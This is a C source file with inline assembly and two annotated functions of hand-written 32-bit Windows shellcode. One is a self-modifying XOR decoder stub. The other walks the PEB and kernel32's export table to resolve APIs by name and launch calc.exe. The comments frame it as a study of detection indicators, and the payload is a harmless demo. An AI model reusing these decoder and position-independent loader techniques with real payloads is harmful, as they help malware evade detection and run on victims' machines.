// Two MSVC __declspec(naked) functions whose bodies are hand-written 32-bit
// shellcode in Microsoft inline-asm syntax (Win32 stdcall API calls). Being
// "naked", neither gets a compiler prologue/epilogue; both avoid absolute
// addresses (call/pop self-location, PEB walk, name-based export lookup).
// For detection engineering these are the classic static/dynamic indicators:
// fs:[0x30] PEB access, manual IMAGE_EXPORT_DIRECTORY parsing, a call/pop
// pair to obtain the current address, and a single-byte XOR decoder loop.

// ClearZero: XOR decoder stub. Decodes the 0xC7 bytes that follow
// _ShellCodeStart in place (each byte ^= 0x11), then jumps to them.
// Self-modifying: it writes into its own code bytes, so it only runs from
// memory that is both writable and executable (DEP / W^X stops it).
void __declspec(naked)ClearZero() {
    __asm{
        jmp _END1;                      // forward to the call that records our own address
    _Next:
        pop ebx;                        // ebx = return address = &_ShellCodeStart
        dec ebx;                        // ebx = &_ShellCodeStart - 1, so [ebx+ecx] covers ecx = 0xC7..1
        xor ecx, ecx;
        mov cl, 0xC7;                   // byte count to decode -- presumably the encoded payload length; not derived
    _LoopStart:
        xor byte ptr[ebx + ecx], 0x11;  // single-byte XOR key 0x11
        loop _LoopStart;                // decodes [&_ShellCodeStart .. &_ShellCodeStart + 0xC6]
        jmp _ShellCodeStart;
    _END1:
        call _Next;                     // pushes &_ShellCodeStart, popped at _Next
        // start executing the real shellcode
    _ShellCodeStart:
        int 3;                          // placeholder; the encoded payload presumably occupies this region (the loop XORs it too)
    }
}

// ExecuteCalc: takes a module base from the PEB loader list (expected to be
// kernel32), resolves GetProcAddress by scanning that module's export name
// table for a name starting "GetProcA", then resolves LoadLibraryA,
// ExitProcess and WinExec by name and runs WinExec("calc.exe", SW_SHOW)
// followed by ExitProcess(0).
// Register roles: ebp = module base during export parsing, afterwards a frame
// pointer into a 0x50-byte scratch frame; edx = export directory; edi = module
// base (hModule argument), afterwards = WinExec.
// NOTE(review): every structure offset is a hard-coded 32-bit Windows layout
// (PEB->Ldr at 0x0c, Ldr->InInitializationOrderModuleList at 0x1c, DllBase at
// 0x08 within the list entry), and the code assumes the second entry of that
// list is kernel32 -- the list order is version-dependent, so confirm per
// Windows version.
void __declspec(naked) ExecuteCalc() {
    __asm{
        // --- module base from the PEB loader data ---
        mov eax,fs:[0x30]               // eax = PEB (TEB + 0x30)
        mov eax,[eax+0xc]               // eax = PEB->Ldr
        mov esi,[eax+0x1c]              // esi = InInitializationOrderModuleList.Flink (first entry)
        lodsd                           // eax = first entry's Flink -> second entry
        mov eax,[eax+0x8]               // eax = entry->DllBase (expected: kernel32)
        mov ebp,eax                     // ebp = module base
        // --- locate the PE export directory ---
        mov eax,[ebp+0x3c]              // e_lfanew
        mov edx,[ebp+eax+0x78]          // RVA of export directory (OptionalHeader DataDirectory[0])
        add edx,ebp                     // edx = IMAGE_EXPORT_DIRECTORY*
        mov ecx,[edx+0x18]              // ecx = NumberOfNames
        mov ebx,[edx+0x20]              // RVA of AddressOfNames
        add ebx,ebp                     // ebx = name RVA table
        // --- scan names from the end for one beginning "GetProcA" ---
    search:
        dec ecx                         // unbounded downward scan; relies on the name being present
        mov esi,[ebx+ecx*4]
        add esi,ebp                     // esi = export name string
        mov eax,0x50746547              // "GetP" (little-endian)
        cmp [esi],eax
        jne search
        mov eax,0x41636f72              // "rocA"
        cmp [esi+4],eax
        jne search
        mov eax,0x41636f72              // duplicate of the check above; redundant but harmless
        cmp [esi+4],eax
        jne search
        // --- name index -> ordinal -> function address ---
        mov ebx,[edx+0x24]
        add ebx,ebp                     // ebx = AddressOfNameOrdinals
        mov cx,[ebx+ecx*2]              // cx = ordinal (16-bit write; upper half of ecx is left as-is)
        mov ebx,[edx+0x1c]
        add ebx,ebp                     // ebx = AddressOfFunctions
        mov eax,[ebx+ecx*4]
        add eax,ebp                     // eax = GetProcAddress
        // --- scratch frame; edi keeps the module base as hModule for GetProcAddress ---
        mov edi,ebp
        push ebp
        sub esp,0x50
        mov ebp,esp
        mov [ebp+0x40],eax // GetProcAddress
        // API names are built on the stack by pushing their dwords last-to-first; esp then points at the string
        push 0                          // NUL terminator
        push 0x41797261                 // "aryA"
        push 0x7262694C                 // "Libr"
        push 0x64616F4C                 // "Load"
        push esp                        // lpProcName = "LoadLibraryA"
        push edi                        // hModule
        call [ebp+0x40] // GetProcAddress(..., "LoadLibraryA")
        mov [ebp+0x44],eax // LoadLibraryA (resolved but never called in this snippet)
        push 0x737365                   // "ess\0"
        push 0x636F7250                 // "Proc"
        push 0x74697845                 // "Exit"
        push esp                        // lpProcName = "ExitProcess"
        push edi                        // hModule
        call [ebp+0x40] // GetProcAddress(..., "ExitProcess")
        mov [ebp+0x4],eax // ExitProcess
        push 0x636578                   // "xec\0"
        push 0x456E6957                 // "WinE"
        push esp                        // lpProcName = "WinExec"
        push edi                        // hModule
        call [ebp+0x40] // GetProcAddress(..., "WinExec")
        mov edi,eax                     // edi = WinExec
        mov dword ptr[ebp+0x10],0x636C6163   // "calc"
        mov dword ptr[ebp+0x14],0x6578652E   // ".exe"
        mov dword ptr[ebp+0x18],0            // NUL terminator
        push 5                          // uCmdShow = SW_SHOW
        lea eax,[ebp+0x10]
        push eax                        // lpCmdLine = "calc.exe"
        call edi // WinExec("calc.exe", SW_SHOW)
        push 0;                         // uExitCode = 0
        call [ebp + 0x04]; // ExitProcess(0)
    }
    // WinExec("calc.exe", SW_SHOW);
    // ShellExecuteA(NULL, "open", "calc.exe", NULL, NULL, SW_SHOWNORMAL);
}